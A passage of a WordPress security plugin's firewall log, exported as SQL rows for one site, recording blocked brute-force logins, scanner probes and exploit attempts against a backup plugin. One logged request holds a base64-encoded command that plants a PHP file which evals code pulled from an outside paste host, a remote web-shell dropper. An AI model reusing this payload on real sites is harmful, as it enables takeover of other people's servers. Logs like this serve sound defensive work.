Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14935,0.000000,1704786023.192838,'\0\0\0\0\0\0\0\0\0\03',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14936,0.000000,1704786470.984780,'\0\0\0\0\0\0\0\0\0\0N.',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14937,0.000000,1704787226.333481,'\0\0\0\0\0\0\0\0\0\0»',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14938,0.000000,1704787458.548446,'\0\0\0\0\0\0\0\0\0\0b2b',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14887,1704759573.215420,1704759573.151600,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"ZWNobyAiPD9waHAgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cHM6Ly9yZW50cnkuY28vMmJ1Z20vcmF3JykpOyIgLi4vLi4vLi4vdXBsb2Fkcy93cC1ia2N6LnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14951,0.000000,1704792135.481307,'\0\0\0\0\0\0\0\0\0\0̼',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14959,0.000000,1704795079.967357,'\0\0\0\0\0\0\0\0\0\0xM#',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14960,0.000000,1704795198.553983,'\0\0\0\0\0\0\0\0\0\0@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14961,0.000000,1704795441.642689,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14962,0.000000,1704795776.711544,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14963,0.000000,1704796576.817367,'\0\0\0\0\0\0\0\0\0\0]/u',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14964,0.000000,1704797112.425664,'&\0\0\0\0\0\0 ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14965,0.000000,1704797349.739408,'\0\0\0\0\0\0\0\0\0\0L',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14966,0.000000,1704799028.400143,'\0\0\0\0\0\0\0\0\0\0j&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14967,0.000000,1704799272.089186,'&\0\0@',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14968,0.000000,1704800965.361928,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14897,1704763346.960983,1704763346.883300,'\0\0\0\0\0\0\0\0\0\0r&',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14949,1704791720.277251,1704791720.171000,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14952,0.000000,1704792280.075110,'\0\0\0\0\0\0\0\0\0\06|',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14953,0.000000,1704793108.326289,'\0\0\0\0\0\0\0\0\0\0 8f',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14954,0.000000,1704793284.497487,'\0\0\0\0\0\0\0\0\0\0\0[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14955,1704793384.751819,1704793384.683900,'\0\0\0\0\0\0\0\0\0\0&)',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/install.php?step=1',NULL,NULL,'blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14950,0.000000,1704791734.983500,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14888,1704759595.875262,1704759595.804400,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14890,0.000000,1704761141.211116,'\0\0\0\0\0\0\0\0\0\0\\?Α',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14891,0.000000,1704761381.630546,' A\0$T\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14892,0.000000,1704761465.111636,'\0\0\0\0\0\0\0\0\0\0t',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14893,1704761813.745010,1704761813.666300,'\0\0\0\0\0\0\0\0\0\0t',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(14894,0.000000,1704763042.777345,'\0\0\0\0\0\0\0\0\0\0Wb',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14895,0.000000,1704763284.921141,'\0\0\0\0\0\0\0\0\0\03',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14896,1704763351.824227,1704763351.759200,'\0\0\0\0\0\0\0\0\0\0r&',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14969,0.000000,1704801204.563311,'\0\0\0\0\0\0\0\0\0\0n',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14970,0.000000,1704801442.095827,'\0\0\0\0\0\0\0\0\0\0b7',0,200,0,1,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailValidUsername',NULL,NULL),(14971,0.000000,1704801650.288361,'\0\0\0\0\0\0\0\0\0\0i',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14972,0.000000,1704802896.417847,'\0\0\0\0\0\0\0\0\0\0#`',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14973,0.000000,1704803140.880566,'\0\0\0\0\0\0\0\0\0\0z{',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14974,0.000000,1704804550.536426,'\0\0\0\0\0\0\0\0\0\0',0,200,0,1,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','loginFailValidUsername',NULL,NULL),(14975,0.000000,1704804835.218957,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14976,0.000000,1704805078.934683,'*\0\Z(]\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14977,0.000000,1704806777.641237,'\0\0\0\0\0\0\0\0\0\0j&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14978,0.000000,1704807023.689395,'\0\0\0\0\0\0\0\0\0\06%',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14979,0.000000,1704807176.953827,'\0\0\0\0\0\0\0\0\0\0E',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14889,0.000000,1704760870.219430,'\0\0\0\0\0\0\0\0\0\0U',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15171,0.000000,1704855181.492149,'\0\0\0\0\0\0\0\0\0\03k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15172,0.000000,1704855350.203515,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15173,0.000000,1704855350.138630,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15174,0.000000,1704855654.200171,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','loginFailValidUsername',NULL,NULL),(15175,0.000000,1704855673.675752,'\0\0\0\0\0\0\0\0\0\0͹ul',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15176,1704855869.459211,1704855869.375900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15177,1704855869.400745,1704855869.322300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15178,0.000000,1704856393.268705,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15179,0.000000,1704856393.235654,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15180,1704856912.717738,1704856912.642600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15181,1704856912.711705,1704856912.641600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15182,0.000000,1704856963.769747,'  \0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15183,0.000000,1704857432.943364,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15184,0.000000,1704857432.965886,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15185,1704857740.305010,1704857740.226800,'&\0\0}\0Un{Lˬ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(15248,1704880036.762959,1704880036.707800,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/admin/uploads/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMvaW1hZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15249,1704880034.869741,1704880034.807900,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/components/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15250,1704880032.651868,1704880032.580500,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/modules/mod_simplefileuploadv1.3/elements/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMvbW9kX3NpbXBsZWZpbGV1cGxvYWR2MS4zL2VsZW1lbnRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15251,1704880030.769902,1704880030.664400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/admin/controller/extension/extension/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15252,1704880029.811246,1704880029.710000,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/sites/default/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15253,1704880027.870737,1704880027.762300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/admin/fckeditor/editor/filemanager/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 